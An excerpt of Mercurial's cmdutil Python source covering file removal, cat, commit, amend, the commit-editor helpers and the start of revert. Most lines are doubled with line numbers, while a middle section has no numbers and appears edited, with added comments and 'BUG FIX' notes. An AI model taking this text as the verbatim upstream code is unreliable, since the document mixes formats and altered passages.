2749 % join(subpath))
2749 % join(subpath))
2750 ui.progress(_('searching'), None)
2750 ui.progress(_('searching'), None)
2751
2751
2752 # warn about failure to delete explicit files/dirs
2752 # warn about failure to delete explicit files/dirs
2753 deleteddirs = util.dirs(deleted)
2753 deleteddirs = util.dirs(deleted)
2754 files = m.files()
2754 files = m.files()
2755 total = len(files)
2755 total = len(files)
2756 count = 0
2756 count = 0
2757 for f in files:
2757 for f in files:
2758 def insubrepo():
2758 def insubrepo():
2759 for subpath in wctx.substate:
2759 for subpath in wctx.substate:
2760 if f.startswith(subpath + '/'):
2760 if f.startswith(subpath + '/'):
2761 return True
2761 return True
2762 return False
2762 return False
2763
2763
2764 count += 1
2764 count += 1
2765 ui.progress(_('deleting'), count, total=total, unit=_('files'))
2765 ui.progress(_('deleting'), count, total=total, unit=_('files'))
2766 isdir = f in deleteddirs or wctx.hasdir(f)
2766 isdir = f in deleteddirs or wctx.hasdir(f)
2767 if (f in repo.dirstate or isdir or f == '.'
2767 if (f in repo.dirstate or isdir or f == '.'
2768 or insubrepo() or f in subs):
2768 or insubrepo() or f in subs):
2769 continue
2769 continue
2770
2770
2771 if repo.wvfs.exists(f):
2771 if repo.wvfs.exists(f):
2772 if repo.wvfs.isdir(f):
2772 if repo.wvfs.isdir(f):
2773 warnings.append(_('not removing %s: no tracked files\n')
2773 warnings.append(_('not removing %s: no tracked files\n')
2774 % m.rel(f))
2774 % m.rel(f))
2775 else:
2775 else:
2776 warnings.append(_('not removing %s: file is untracked\n')
2776 warnings.append(_('not removing %s: file is untracked\n')
2777 % m.rel(f))
2777 % m.rel(f))
2778 # missing files will generate a warning elsewhere
2778 # missing files will generate a warning elsewhere
2779 ret = 1
2779 ret = 1
2780 ui.progress(_('deleting'), None)
2780 ui.progress(_('deleting'), None)
2781
2781
2782 if force:
2782 if force:
2783 list = modified + deleted + clean + added
2783 list = modified + deleted + clean + added
2784 elif after:
2784 elif after:
2785 list = deleted
2785 list = deleted
2786 remaining = modified + added + clean
2786 remaining = modified + added + clean
2787 total = len(remaining)
2787 total = len(remaining)
2788 count = 0
2788 count = 0
2789 for f in remaining:
2789 for f in remaining:
2790 count += 1
2790 count += 1
2791 ui.progress(_('skipping'), count, total=total, unit=_('files'))
2791 ui.progress(_('skipping'), count, total=total, unit=_('files'))
2792 warnings.append(_('not removing %s: file still exists\n')
2792 warnings.append(_('not removing %s: file still exists\n')
2793 % m.rel(f))
2793 % m.rel(f))
2794 ret = 1
2794 ret = 1
2795 ui.progress(_('skipping'), None)
2795 ui.progress(_('skipping'), None)
2796 else:
2796 else:
2797 list = deleted + clean
2797 list = deleted + clean
2798 total = len(modified) + len(added)
2798 total = len(modified) + len(added)
2799 count = 0
2799 count = 0
2800 for f in modified:
2800 for f in modified:
2801 count += 1
2801 count += 1
2802 ui.progress(_('skipping'), count, total=total, unit=_('files'))
2802 ui.progress(_('skipping'), count, total=total, unit=_('files'))
2803 warnings.append(_('not removing %s: file is modified (use -f'
2803 warnings.append(_('not removing %s: file is modified (use -f'
2804 ' to force removal)\n') % m.rel(f))
2804 ' to force removal)\n') % m.rel(f))
2805 ret = 1
2805 ret = 1
2806 for f in added:
2806 for f in added:
2807 count += 1
2807 count += 1
2808 ui.progress(_('skipping'), count, total=total, unit=_('files'))
2808 ui.progress(_('skipping'), count, total=total, unit=_('files'))
2809 warnings.append(_("not removing %s: file has been marked for add"
2809 warnings.append(_("not removing %s: file has been marked for add"
2810 " (use 'hg forget' to undo add)\n") % m.rel(f))
2810 " (use 'hg forget' to undo add)\n") % m.rel(f))
2811 ret = 1
2811 ret = 1
2812 ui.progress(_('skipping'), None)
2812 ui.progress(_('skipping'), None)
2813
2813
2814 list = sorted(list)
2814 list = sorted(list)
2815 total = len(list)
2815 total = len(list)
2816 count = 0
2816 count = 0
2817 for f in list:
2817 for f in list:
2818 count += 1
2818 count += 1
2819 if ui.verbose or not m.exact(f):
2819 if ui.verbose or not m.exact(f):
2820 ui.progress(_('deleting'), count, total=total, unit=_('files'))
2820 ui.progress(_('deleting'), count, total=total, unit=_('files'))
2821 ui.status(_('removing %s\n') % m.rel(f))
2821 ui.status(_('removing %s\n') % m.rel(f))
2822 ui.progress(_('deleting'), None)
2822 ui.progress(_('deleting'), None)
2823
2823
2824 with repo.wlock():
2824 with repo.wlock():
2825 if not after:
2825 if not after:
2826 for f in list:
2826 for f in list:
2827 if f in added:
2827 if f in added:
2828 continue # we never unlink added files on remove
2828 continue # we never unlink added files on remove
2829 repo.wvfs.unlinkpath(f, ignoremissing=True)
2829 repo.wvfs.unlinkpath(f, ignoremissing=True)
2830 repo[None].forget(list)
2830 repo[None].forget(list)
2831
2831
2832 if warn:
2832 if warn:
2833 for warning in warnings:
2833 for warning in warnings:
2834 ui.warn(warning)
2834 ui.warn(warning)
2835
2835
2836 return ret
2836 return ret
2837
2837
2838 def cat(ui, repo, ctx, matcher, basefm, fntemplate, prefix, **opts):
2838 def cat(ui, repo, ctx, matcher, basefm, fntemplate, prefix, **opts):
2839 err = 1
2839 err = 1
2840
2840
2841 def write(path):
2841 def write(path):
2842 filename = None
2842 filename = None
2843 if fntemplate:
2843 if fntemplate:
2844 filename = makefilename(repo, fntemplate, ctx.node(),
2844 filename = makefilename(repo, fntemplate, ctx.node(),
2845 pathname=os.path.join(prefix, path))
2845 pathname=os.path.join(prefix, path))
2846 with formatter.maybereopen(basefm, filename, opts) as fm:
2846 with formatter.maybereopen(basefm, filename, opts) as fm:
2847 data = ctx[path].data()
2847 data = ctx[path].data()
2848 if opts.get('decode'):
2848 if opts.get('decode'):
2849 data = repo.wwritedata(path, data)
2849 data = repo.wwritedata(path, data)
2850 fm.startitem()
2850 fm.startitem()
2851 fm.write('data', '%s', data)
2851 fm.write('data', '%s', data)
2852 fm.data(abspath=path, path=matcher.rel(path))
2852 fm.data(abspath=path, path=matcher.rel(path))
2853
2853
2854 # Automation often uses hg cat on single files, so special case it
2854 # Automation often uses hg cat on single files, so special case it
2855 # for performance to avoid the cost of parsing the manifest.
2855 # for performance to avoid the cost of parsing the manifest.
2856 if len(matcher.files()) == 1 and not matcher.anypats():
2856 if len(matcher.files()) == 1 and not matcher.anypats():
2857 file = matcher.files()[0]
2857 file = matcher.files()[0]
2858 mfl = repo.manifestlog
2858 mfl = repo.manifestlog
2859 mfnode = ctx.manifestnode()
2859 mfnode = ctx.manifestnode()
2860 try:
2860 try:
2861 if mfnode and mfl[mfnode].find(file)[0]:
2861 if mfnode and mfl[mfnode].find(file)[0]:
2862 write(file)
2862 write(file)
2863 return 0
2863 return 0
2864 except KeyError:
2864 except KeyError:
2865 pass
2865 pass
2866
2866
2867 for abs in ctx.walk(matcher):
2867 for abs in ctx.walk(matcher):
2868 write(abs)
2868 write(abs)
2869 err = 0
2869 err = 0
2870
2870
2871 for subpath in sorted(ctx.substate):
2871 for subpath in sorted(ctx.substate):
2872 sub = ctx.sub(subpath)
2872 sub = ctx.sub(subpath)
2873 try:
2873 try:
2874 submatch = matchmod.subdirmatcher(subpath, matcher)
2874 submatch = matchmod.subdirmatcher(subpath, matcher)
2875
2875
2876 if not sub.cat(submatch, basefm, fntemplate,
2876 if not sub.cat(submatch, basefm, fntemplate,
2877 os.path.join(prefix, sub._path), **opts):
2877 os.path.join(prefix, sub._path), **opts):
2878 err = 0
2878 err = 0
2879 except error.RepoLookupError:
2879 except error.RepoLookupError:
2880 ui.status(_("skipping missing subrepository: %s\n")
2880 ui.status(_("skipping missing subrepository: %s\n")
2881 % os.path.join(prefix, subpath))
2881 % os.path.join(prefix, subpath))
2882
2882
2883 return err
2883 return err
2884
2884
def commit(ui, repo, commitfunc, pats, opts):
    '''commit the specified files or all outstanding changes'''
    # Convert a user-supplied --date string into the internal
    # representation up front so commitfunc receives a parsed value.
    userdate = opts.get('date')
    if userdate:
        opts['date'] = util.parsedate(userdate)
    message = logmessage(ui, opts)
    matcher = scmutil.match(repo[None], pats, opts)

    # extract addremove carefully -- this function can be called from a
    # command that doesn't support addremove
    dsguard = None
    try:
        if opts.get('addremove'):
            # guard the dirstate so an aborted commit also rolls back the
            # add/remove markings
            dsguard = dirstateguard.dirstateguard(repo, 'commit')
            if scmutil.addremove(repo, matcher, "", opts) != 0:
                raise error.Abort(
                    _("failed to mark all new/missing files as added/removed"))

        result = commitfunc(ui, repo, message, matcher, opts)
        if dsguard:
            dsguard.close()
        return result
    finally:
        if dsguard:
            dsguard.release()
2910
2910
def samefile(f, ctx1, ctx2):
    """Return True if file f is effectively identical in both contexts.

    "Identical" means present in both with equal content and equal flags,
    or absent from both.  Present in exactly one context is False.
    """
    in1 = f in ctx1.manifest()
    in2 = f in ctx2.manifest()
    if not in1:
        # absent from ctx1: same only if also absent from ctx2
        return not in2
    if not in2:
        return False
    a = ctx1.filectx(f)
    b = ctx2.filectx(f)
    # cmp() returns truthy when contents differ
    return not a.cmp(b) and a.flags() == b.flags()
2922
2922
def amend(ui, repo, commitfunc, old, extra, pats, opts):
    """Amend changeset `old` with the working directory changes and/or new
    metadata from opts; returns the node of the amended changeset (or
    old.node() when nothing changed)."""
    # avoid cycle context -> subrepo -> cmdutil
    from . import context

    # amend will reuse the existing user if not specified, but the obsolete
    # marker creation requires that the current user's name is specified.
    if obsolete.isenabled(repo, obsolete.createmarkersopt):
        ui.username() # raise exception if username not set

    ui.note(_('amending changeset %s\n') % old)
    base = old.p1()

    newid = None
    with repo.wlock(), repo.lock(), repo.transaction('amend'):
        # See if we got a message from -m or -l, if not, open the editor
        # with the message of the changeset to amend
        message = logmessage(ui, opts)
        # ensure logfile does not conflict with later enforcement of the
        # message. potential logfile content has been processed by
        # `logmessage` anyway.
        opts.pop('logfile')
        # First, do a regular commit to record all changes in the working
        # directory (if there are any)
        ui.callhooks = False
        activebookmark = repo._bookmarks.active
        try:
            repo._bookmarks.active = None
            opts['message'] = 'temporary amend commit for %s' % old
            node = commit(ui, repo, commitfunc, pats, opts)
        finally:
            repo._bookmarks.active = activebookmark
            ui.callhooks = True
        ctx = repo[node]

        # Participating changesets:
        #
        # node/ctx o - new (intermediate) commit that contains changes
        # |          from working dir to go into amending commit
        # |          (or a workingctx if there were no changes)
        # |
        # old      o - changeset to amend
        # |
        # base     o - parent of amending changeset

        # Update extra dict from amended commit (e.g. to preserve graft
        # source)
        extra.update(old.extra())

        # Also update it from the intermediate commit or from the wctx
        extra.update(ctx.extra())

        if len(old.parents()) > 1:
            # ctx.files() isn't reliable for merges, so fall back to the
            # slower repo.status() method
            files = set([fn for st in repo.status(base, old)[:3]
                         for fn in st])
        else:
            files = set(old.files())

        # Second, we use either the commit we just did, or if there were no
        # changes the parent of the working directory as the version of the
        # files in the final amend commit
        if node:
            ui.note(_('copying changeset %s to %s\n') % (ctx, base))

            user = ctx.user()
            date = ctx.date()
            # Recompute copies (avoid recording a -> b -> a)
            copied = copies.pathcopies(base, ctx)
            # BUG FIX: the original tested `if old.p2:` -- a bound method,
            # which is always truthy -- so copies were computed against the
            # null context even for non-merge changesets.  Call p2() and
            # rely on changectx truthiness (cf. `if ctx.p2():` in
            # buildcommittext) to only merge in second-parent copies when
            # old is actually a merge.
            if old.p2():
                copied.update(copies.pathcopies(old.p2(), ctx))

            # Prune files which were reverted by the updates: if old
            # introduced file X and our intermediate commit, node,
            # renamed that file, then those two files are the same and
            # we can discard X from our list of files. Likewise if X
            # was deleted, it's no longer relevant
            files.update(ctx.files())
            files = [f for f in files if not samefile(f, ctx, base)]

            def filectxfn(repo, ctx_, path):
                # serve file content/flags/copy info from the intermediate
                # commit; None means "file deleted in the amended commit"
                try:
                    fctx = ctx[path]
                    flags = fctx.flags()
                    mctx = context.memfilectx(repo,
                                              fctx.path(), fctx.data(),
                                              islink='l' in flags,
                                              isexec='x' in flags,
                                              copied=copied.get(path))
                    return mctx
                except KeyError:
                    return None
        else:
            ui.note(_('copying changeset %s to %s\n') % (old, base))

            # Use version of files as in the old cset
            def filectxfn(repo, ctx_, path):
                try:
                    return old.filectx(path)
                except KeyError:
                    return None

        user = opts.get('user') or old.user()
        date = opts.get('date') or old.date()
        editform = mergeeditform(old, 'commit.amend')
        editor = getcommiteditor(editform=editform,
                                 **pycompat.strkwargs(opts))
        if not message:
            # no -m/-l message: open an editor pre-filled with the old
            # description
            editor = getcommiteditor(edit=True, editform=editform)
            message = old.description()

        # snapshot extra before adding amend_source noise so the
        # "nothing changed" comparison below stays meaningful
        pureextra = extra.copy()
        extra['amend_source'] = old.hex()

        new = context.memctx(repo,
                             parents=[base.node(), old.p2().node()],
                             text=message,
                             files=files,
                             filectxfn=filectxfn,
                             user=user,
                             date=date,
                             extra=extra,
                             editor=editor)

        newdesc = changelog.stripdesc(new.description())
        if ((not node)
            and newdesc == old.description()
            and user == old.user()
            and date == old.date()
            and pureextra == old.extra()):
            # nothing changed. continuing here would create a new node
            # anyway because of the amend_source noise.
            #
            # This not what we expect from amend.
            return old.node()

        # commit the replacement under the phase of the amended changeset
        # (or secret on --secret), then restore the configured default
        ph = repo.ui.config('phases', 'new-commit', phases.draft)
        try:
            if opts.get('secret'):
                commitphase = 'secret'
            else:
                commitphase = old.phase()
            repo.ui.setconfig('phases', 'new-commit', commitphase, 'amend')
            newid = repo.commitctx(new)
        finally:
            repo.ui.setconfig('phases', 'new-commit', ph, 'amend')
        if newid != old.node():
            # Reroute the working copy parent to the new changeset
            repo.setparents(newid, nullid)
            mapping = {old.node(): (newid,)}
            if node:
                # the temporary commit is fully superseded; no successor
                mapping[node] = ()
            scmutil.cleanupnodes(repo, mapping, 'amend')
        return newid
3077
3077
def commiteditor(repo, ctx, subs, editform=''):
    """Return ctx's description, launching an editor only when it is empty."""
    desc = ctx.description()
    if desc:
        return desc
    return commitforceeditor(repo, ctx, subs, editform=editform,
                             unchangedmessagedetection=True)
3083
3083
def commitforceeditor(repo, ctx, subs, finishdesc=None, extramsg=None,
                      editform='', unchangedmessagedetection=False):
    """Run the commit-message editor for ctx and return the final text.

    Raises error.Abort when the resulting message is empty, or (with
    unchangedmessagedetection) when the user left the template untouched.
    """
    if not extramsg:
        extramsg = _("Leave message empty to abort commit.")

    # look up the most specific matching 'committemplate' entry, e.g.
    # changeset.commit.amend -> changeset.commit -> changeset
    forms = [e for e in editform.split('.') if e]
    forms.insert(0, 'changeset')
    templatetext = None
    while forms:
        ref = '.'.join(forms)
        if repo.ui.config('committemplate', ref):
            templatetext = committext = buildcommittemplate(
                repo, ctx, subs, extramsg, ref)
            break
        forms.pop()
    else:
        committext = buildcommittext(repo, ctx, subs, extramsg)

    # run editor in the repository root
    olddir = pycompat.getcwd()
    os.chdir(repo.root)
    # BUG FIX: restore the working directory even when the editor (or a
    # pending-write) raises; the original left the process chdir'd into
    # repo.root on any exception path.
    try:
        # make in-memory changes visible to external process
        tr = repo.currenttransaction()
        repo.dirstate.write(tr)
        pending = tr and tr.writepending() and repo.root

        editortext = repo.ui.edit(committext, ctx.user(), ctx.extra(),
                                  editform=editform, pending=pending,
                                  repopath=repo.path)
    finally:
        os.chdir(olddir)
    text = editortext

    # strip away anything below this special string (used for editors that want
    # to display the diff)
    stripbelow = re.search(_linebelow, text, flags=re.MULTILINE)
    if stripbelow:
        text = text[:stripbelow.start()]

    # drop the HG: helper lines
    text = re.sub("(?m)^HG:.*(\n|$)", "", text)

    if finishdesc:
        text = finishdesc(text)
    if not text.strip():
        raise error.Abort(_("empty commit message"))
    if unchangedmessagedetection and editortext == templatetext:
        raise error.Abort(_("commit message unchanged"))

    return text
3133
3133
def buildcommittemplate(repo, ctx, subs, extramsg, ref):
    """Render the 'committemplate' entry named by ref into commit text."""
    ui = repo.ui
    spec = formatter.templatespec(ref, None, None)
    displayer = changeset_templater(ui, repo, spec, None, {}, False)
    # make every committemplate entry resolvable from within the template
    displayer.t.cache.update(
        (name, templater.unquotestring(value))
        for name, value in repo.ui.configitems('committemplate'))

    if not extramsg:
        extramsg = '' # ensure that extramsg is string

    ui.pushbuffer()
    displayer.show(ctx, extramsg=extramsg)
    return ui.popbuffer()
3147
3147
def hgprefix(msg):
    """Prefix each non-empty line of msg with 'HG: ', dropping blank lines."""
    prefixed = ["HG: %s" % line for line in msg.split("\n") if line]
    return "\n".join(prefixed)
3150
3150
def buildcommittext(repo, ctx, subs, extramsg):
    """Assemble the default commit-message skeleton shown in the editor."""
    modified, added, removed = ctx.modified(), ctx.added(), ctx.removed()

    lines = []
    if ctx.description():
        lines.append(ctx.description())
    lines.append("")
    lines.append("") # Empty line between message and comments.
    lines.append(hgprefix(_("Enter commit message."
                            " Lines beginning with 'HG:' are removed.")))
    lines.append(hgprefix(extramsg))
    lines.append("HG: --")
    lines.append(hgprefix(_("user: %s") % ctx.user()))
    if ctx.p2():
        lines.append(hgprefix(_("branch merge")))
    if ctx.branch():
        lines.append(hgprefix(_("branch '%s'") % ctx.branch()))
    if bookmarks.isactivewdirparent(repo):
        lines.append(hgprefix(_("bookmark '%s'") % repo._activebookmark))
    lines.extend(hgprefix(_("subrepo %s") % s) for s in subs)
    lines.extend(hgprefix(_("added %s") % f) for f in added)
    lines.extend(hgprefix(_("changed %s") % f) for f in modified)
    lines.extend(hgprefix(_("removed %s") % f) for f in removed)
    if not added and not modified and not removed:
        lines.append(hgprefix(_("no files changed")))
    lines.append("")

    return "\n".join(lines)
3178
3178
def commitstatus(repo, node, branch, bheads=None, opts=None):
    """Emit informational messages describing the commit just made."""
    if opts is None:
        opts = {}
    ctx = repo[node]
    parents = ctx.parents()

    if not opts.get('amend') and bheads and node not in bheads:
        # did any parent already sit on a head of this branch?
        onbranchhead = [p for p in parents
                        if p.node() in bheads and p.branch() == branch]
        if not onbranchhead:
            repo.ui.status(_('created new head\n'))
            # The message is not printed for initial roots. For the other
            # changesets, it is printed in the following situations:
            #
            # Par column: for the 2 parents with ...
            #   N: null or no parent
            #   B: parent is on another named branch
            #   C: parent is a regular non head changeset
            #   H: parent was a branch head of the current branch
            # Msg column: whether we print "created new head" message
            # In the following, it is assumed that there already exists some
            # initial branch heads of the current branch, otherwise nothing is
            # printed anyway.
            #
            # Par Msg Comment
            # N N  y  additional topo root
            #
            # B N  y  additional branch root
            # C N  y  additional topo head
            # H N  n  usual case
            #
            # B B  y  weird additional branch root
            # C B  y  branch merge
            # H B  n  merge with named branch
            #
            # C C  y  additional head from merge
            # C H  n  merge with a head
            #
            # H H  n  head merge: head count decreases

    if not opts.get('close_branch'):
        for p in parents:
            # committing on top of a closed head reopens the branch
            if p.closesbranch() and p.branch() == branch:
                repo.ui.status(_('reopening closed branch head %d\n') % p)

    if repo.ui.debugflag:
        repo.ui.write(_('committed changeset %d:%s\n') % (int(ctx), ctx.hex()))
    elif repo.ui.verbose:
        repo.ui.write(_('committed changeset %d:%s\n') % (int(ctx), ctx))
3226
3226
def postcommitstatus(repo, pats, opts):
    """Return working-directory status for files matched by pats/opts."""
    matcher = scmutil.match(repo[None], pats, opts)
    return repo.status(match=matcher)
3229
3229
3230 def revert(ui, repo, ctx, parents, *pats, **opts):
3230 def revert(ui, repo, ctx, parents, *pats, **opts):
3231 parent, p2 = parents
3231 parent, p2 = parents
3232 node = ctx.node()
3232 node = ctx.node()
3233
3233
3234 mf = ctx.manifest()
3234 mf = ctx.manifest()
3235 if node == p2:
3235 if node == p2:
3236 parent = p2
3236 parent = p2
3237
3237
3238 # need all matching names in dirstate and manifest of target rev,
3238 # need all matching names in dirstate and manifest of target rev,
3239 # so have to walk both. do not print errors if files exist in one
3239 # so have to walk both. do not print errors if files exist in one
3240 # but not other. in both cases, filesets should be evaluated against
3240 # but not other. in both cases, filesets should be evaluated against
3241 # workingctx to get consistent result (issue4497). this means 'set:**'
3241 # workingctx to get consistent result (issue4497). this means 'set:**'
3242 # cannot be used to select missing files from target rev.
3242 # cannot be used to select missing files from target rev.
3243
3243
3244 # `names` is a mapping for all elements in working copy and target revision
3244 # `names` is a mapping for all elements in working copy and target revision
3245 # The mapping is in the form:
3245 # The mapping is in the form:
3246 # <asb path in repo> -> (<path from CWD>, <exactly specified by matcher?>)
3246 # <asb path in repo> -> (<path from CWD>, <exactly specified by matcher?>)
3247 names = {}
3247 names = {}
3248
3248
3249 with repo.wlock():
3249 with repo.wlock():
3250 ## filling of the `names` mapping
3250 ## filling of the `names` mapping
3251 # walk dirstate to fill `names`
3251 # walk dirstate to fill `names`
3252
3252
3253 interactive = opts.get('interactive', False)
3253 interactive = opts.get('interactive', False)
3254 wctx = repo[None]
3254 wctx = repo[None]
3255 m = scmutil.match(wctx, pats, opts)
3255 m = scmutil.match(wctx, pats, opts)
3256
3256
3257 # we'll need this later
3257 # we'll need this later
3258 targetsubs = sorted(s for s in wctx.substate if m(s))
3258 targetsubs = sorted(s for s in wctx.substate if m(s))
3259
3259
3260 if not m.always():
3260 if not m.always():
3261 matcher = matchmod.badmatch(m, lambda x, y: False)
3261 matcher = matchmod.badmatch(m, lambda x, y: False)
3262 for abs in wctx.walk(matcher):
3262 for abs in wctx.walk(matcher):
3263 names[abs] = m.rel(abs), m.exact(abs)
3263 names[abs] = m.rel(abs), m.exact(abs)
3264
3264
3265 # walk target manifest to fill `names`
3265 # walk target manifest to fill `names`
3266
3266
3267 def badfn(path, msg):
3267 def badfn(path, msg):
3268 if path in names:
3268 if path in names:
3269 return
3269 return
3270 if path in ctx.substate:
3270 if path in ctx.substate:
3271 return
3271 return
3272 path_ = path + '/'
3272 path_ = path + '/'
3273 for f in names:
3273 for f in names:
3274 if f.startswith(path_):
3274 if f.startswith(path_):
3275 return
3275 return
3276 ui.warn("%s: %s\n" % (m.rel(path), msg))
3276 ui.warn("%s: %s\n" % (m.rel(path), msg))
3277
3277
3278 for abs in ctx.walk(matchmod.badmatch(m, badfn)):
3278 for abs in ctx.walk(matchmod.badmatch(m, badfn)):
3279 if abs not in names:
3279 if abs not in names:
3280 names[abs] = m.rel(abs), m.exact(abs)
3280 names[abs] = m.rel(abs), m.exact(abs)
3281
3281
3282 # Find status of all file in `names`.
3282 # Find status of all file in `names`.
3283 m = scmutil.matchfiles(repo, names)
3283 m = scmutil.matchfiles(repo, names)
3284
3284
3285 changes = repo.status(node1=node, match=m,
3285 changes = repo.status(node1=node, match=m,
3286 unknown=True, ignored=True, clean=True)
3286 unknown=True, ignored=True, clean=True)
3287 else:
3287 else:
3288 changes = repo.status(node1=node, match=m)
3288 changes = repo.status(node1=node, match=m)
3289 for kind in changes:
3289 for kind in changes:
3290 for abs in kind:
3290 for abs in kind:
3291 names[abs] = m.rel(abs), m.exact(abs)
3291 names[abs] = m.rel(abs), m.exact(abs)
3292
3292
3293 m = scmutil.matchfiles(repo, names)
3293 m = scmutil.matchfiles(repo, names)
3294
3294
3295 modified = set(changes.modified)
3295 modified = set(changes.modified)
3296 added = set(changes.added)
3296 added = set(changes.added)
3297 removed = set(changes.removed)
3297 removed = set(changes.removed)
3298 _deleted = set(changes.deleted)
3298 _deleted = set(changes.deleted)
3299 unknown = set(changes.unknown)
3299 unknown = set(changes.unknown)
3300 unknown.update(changes.ignored)
3300 unknown.update(changes.ignored)
3301 clean = set(changes.clean)
3301 clean = set(changes.clean)
3302 modadded = set()
3302 modadded = set()
3303
3303
3304 # We need to account for the state of the file in the dirstate,
3304 # We need to account for the state of the file in the dirstate,
3305 # even when we revert against something else than parent. This will
3305 # even when we revert against something else than parent. This will
3306 # slightly alter the behavior of revert (doing back up or not, delete
3306 # slightly alter the behavior of revert (doing back up or not, delete
3307 # or just forget etc).
3307 # or just forget etc).
3308 if parent == node:
3308 if parent == node:
3309 dsmodified = modified
3309 dsmodified = modified
3310 dsadded = added
3310 dsadded = added
3311 dsremoved = removed
3311 dsremoved = removed
3312 # store all local modifications, useful later for rename detection
3312 # store all local modifications, useful later for rename detection
3313 localchanges = dsmodified | dsadded
3313 localchanges = dsmodified | dsadded
3314 modified, added, removed = set(), set(), set()
3314 modified, added, removed = set(), set(), set()
3315 else:
3315 else:
3316 changes = repo.status(node1=parent, match=m)
3316 changes = repo.status(node1=parent, match=m)
3317 dsmodified = set(changes.modified)
3317 dsmodified = set(changes.modified)
3318 dsadded = set(changes.added)
3318 dsadded = set(changes.added)
3319 dsremoved = set(changes.removed)
3319 dsremoved = set(changes.removed)
3320 # store all local modifications, useful later for rename detection
3320 # store all local modifications, useful later for rename detection
3321 localchanges = dsmodified | dsadded
3321 localchanges = dsmodified | dsadded
3322
3322
3323 # only take into account for removes between wc and target
3323 # only take into account for removes between wc and target
3324 clean |= dsremoved - removed
3324 clean |= dsremoved - removed
3325 dsremoved &= removed
3325 dsremoved &= removed
3326 # distinct between dirstate remove and other
3326 # distinct between dirstate remove and other
3327 removed -= dsremoved
3327 removed -= dsremoved
3328
3328
3329 modadded = added & dsmodified
3329 modadded = added & dsmodified
3330 added -= modadded
3330 added -= modadded
3331
3331
3332 # tell newly modified apart.
3332 # tell newly modified apart.
3333 dsmodified &= modified
3333 dsmodified &= modified
3334 dsmodified |= modified & dsadded # dirstate added may need backup
3334 dsmodified |= modified & dsadded # dirstate added may need backup
3335 modified -= dsmodified
3335 modified -= dsmodified
3336
3336
3337 # We need to wait for some post-processing to update this set
3337 # We need to wait for some post-processing to update this set
3338 # before making the distinction. The dirstate will be used for
3338 # before making the distinction. The dirstate will be used for
3339 # that purpose.
3339 # that purpose.
3340 dsadded = added
3340 dsadded = added
3341
3341
3342 # in case of merge, files that are actually added can be reported as
3342 # in case of merge, files that are actually added can be reported as
3343 # modified, we need to post process the result
3343 # modified, we need to post process the result
3344 if p2 != nullid:
3344 if p2 != nullid:
3345 mergeadd = set(dsmodified)
3345 mergeadd = set(dsmodified)
3346 for path in dsmodified:
3346 for path in dsmodified:
3347 if path in mf:
3347 if path in mf:
3348 mergeadd.remove(path)
3348 mergeadd.remove(path)
3349 dsadded |= mergeadd
3349 dsadded |= mergeadd
3350 dsmodified -= mergeadd
3350 dsmodified -= mergeadd
3351
3351
3352 # if f is a rename, update `names` to also revert the source
3352 # if f is a rename, update `names` to also revert the source
3353 cwd = repo.getcwd()
3353 cwd = repo.getcwd()
3354 for f in localchanges:
3354 for f in localchanges:
3355 src = repo.dirstate.copied(f)
3355 src = repo.dirstate.copied(f)
3356 # XXX should we check for rename down to target node?
3356 # XXX should we check for rename down to target node?
3357 if src and src not in names and repo.dirstate[src] == 'r':
3357 if src and src not in names and repo.dirstate[src] == 'r':
3358 dsremoved.add(src)
3358 dsremoved.add(src)
3359 names[src] = (repo.pathto(src, cwd), True)
3359 names[src] = (repo.pathto(src, cwd), True)
3360
3360
3361 # determine the exact nature of the deleted changesets
3361 # determine the exact nature of the deleted changesets
3362 deladded = set(_deleted)
3362 deladded = set(_deleted)
3363 for path in _deleted:
3363 for path in _deleted:
3364 if path in mf:
3364 if path in mf:
3365 deladded.remove(path)
3365 deladded.remove(path)
3366 deleted = _deleted - deladded
3366 deleted = _deleted - deladded
3367
3367
3368 # distinguish between file to forget and the other
3368 # distinguish between file to forget and the other
3369 added = set()
3369 added = set()
3370 for abs in dsadded:
3370 for abs in dsadded:
3371 if repo.dirstate[abs] != 'a':
3371 if repo.dirstate[abs] != 'a':
3372 added.add(abs)
3372 added.add(abs)
3373 dsadded -= added
3373 dsadded -= added
3374
3374
3375 for abs in deladded:
3375 for abs in deladded:
3376 if repo.dirstate[abs] == 'a':
3376 if repo.dirstate[abs] == 'a':
3377 dsadded.add(abs)
3377 dsadded.add(abs)
3378 deladded -= dsadded
3378 deladded -= dsadded
3379
3379
3380 # For files marked as removed, we check if an unknown file is present at
3380 # For files marked as removed, we check if an unknown file is present at
3381 # the same path. If a such file exists it may need to be backed up.
3381 # the same path. If a such file exists it may need to be backed up.
3382 # Making the distinction at this stage helps have simpler backup
3382 # Making the distinction at this stage helps have simpler backup
3383 # logic.
3383 # logic.
3384 removunk = set()
3384 removunk = set()
3385 for abs in removed:
3385 for abs in removed:
3386 target = repo.wjoin(abs)
3386 target = repo.wjoin(abs)
3387 if os.path.lexists(target):
3387 if os.path.lexists(target):
3388 removunk.add(abs)
3388 removunk.add(abs)
3389 removed -= removunk
3389 removed -= removunk
3390
3390
3391 dsremovunk = set()
3391 dsremovunk = set()
3392 for abs in dsremoved:
3392 for abs in dsremoved:
3393 target = repo.wjoin(abs)
3393 target = repo.wjoin(abs)
3394 if os.path.lexists(target):
3394 if os.path.lexists(target):
3395 dsremovunk.add(abs)
3395 dsremovunk.add(abs)
3396 dsremoved -= dsremovunk
3396 dsremoved -= dsremovunk
3397
3397
3398 # action to be actually performed by revert
3398 # action to be actually performed by revert
3399 # (<list of file>, message>) tuple
3399 # (<list of file>, message>) tuple
3400 actions = {'revert': ([], _('reverting %s\n')),
3400 actions = {'revert': ([], _('reverting %s\n')),
3401 'add': ([], _('adding %s\n')),
3401 'add': ([], _('adding %s\n')),
3402 'remove': ([], _('removing %s\n')),
3402 'remove': ([], _('removing %s\n')),
3403 'drop': ([], _('removing %s\n')),
3403 'drop': ([], _('removing %s\n')),
3404 'forget': ([], _('forgetting %s\n')),
3404 'forget': ([], _('forgetting %s\n')),
3405 'undelete': ([], _('undeleting %s\n')),
3405 'undelete': ([], _('undeleting %s\n')),
3406 'noop': (None, _('no changes needed to %s\n')),
3406 'noop': (None, _('no changes needed to %s\n')),
3407 'unknown': (None, _('file not managed: %s\n')),
3407 'unknown': (None, _('file not managed: %s\n')),
3408 }
3408 }
3409
3409
3410 # "constant" that convey the backup strategy.
3410 # "constant" that convey the backup strategy.
3411 # All set to `discard` if `no-backup` is set do avoid checking
3411 # All set to `discard` if `no-backup` is set do avoid checking
3412 # no_backup lower in the code.
3412 # no_backup lower in the code.
3413 # These values are ordered for comparison purposes
3413 # These values are ordered for comparison purposes
3414 backupinteractive = 3 # do backup if interactively modified
